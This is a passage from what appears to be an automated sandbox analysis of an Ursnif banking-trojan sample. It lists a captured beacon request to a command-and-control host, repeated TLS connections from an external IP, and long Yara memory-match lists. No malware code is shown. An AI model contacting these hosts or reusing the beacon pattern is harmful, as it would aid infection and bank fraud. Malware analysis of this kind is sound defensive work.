          Source: global trafficHTTP traffic detected: GET /tire/m4jBg57LO/F3omyPFCoq2BsJvvqQjq/M_2Frtvqdkes1JW5OTL/BNOx14m03YJ94TjlPw0PZA/GLczTuNVmCYMu/71GtDP5r/ukrg4HqiGfIkYNEYalZxMet/SDWbFyptRt/KM_2FafHnmbZCQsUs/pLVEK0s2DOMd/NxrlfGMBoYt/93NMnwEIHPr7kq/Wl1k8ZjV32EJB93_2FhHV/Qjw6VJUmVv/3MpXPnj1D/cD.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49812 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49813 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49814 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49815 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49816 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49817 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49819 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49820 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49821 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49822 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49823 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49825 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          Yara detected Ursnif
          Source: Yara matchFile source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.518961591.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.664429538.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.517518068.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.520102514.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.470175062.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.471268308.0000000005818000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.520620067.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.517906088.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.494184695.000000000543B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.470929059.00000000055B8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.519944178.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.493926850.0000000004DDB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.617274009.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.495487329.000000000395B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.518696418.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.494405815.000000000569B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.518133566.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.517688433.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.654830894.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.517563234.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.647561301.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7016, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7056, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7084, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: control.exe PID: 5832, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: control.exe PID: 5952, type: MEMORYSTR

          E-Banking Fraud:

          Yara detected Ursnif
          Source: Yara matchFile source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.518961591.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.664429538.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.517518068.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.520102514.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.470175062.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.471268308.0000000005818000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.520620067.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: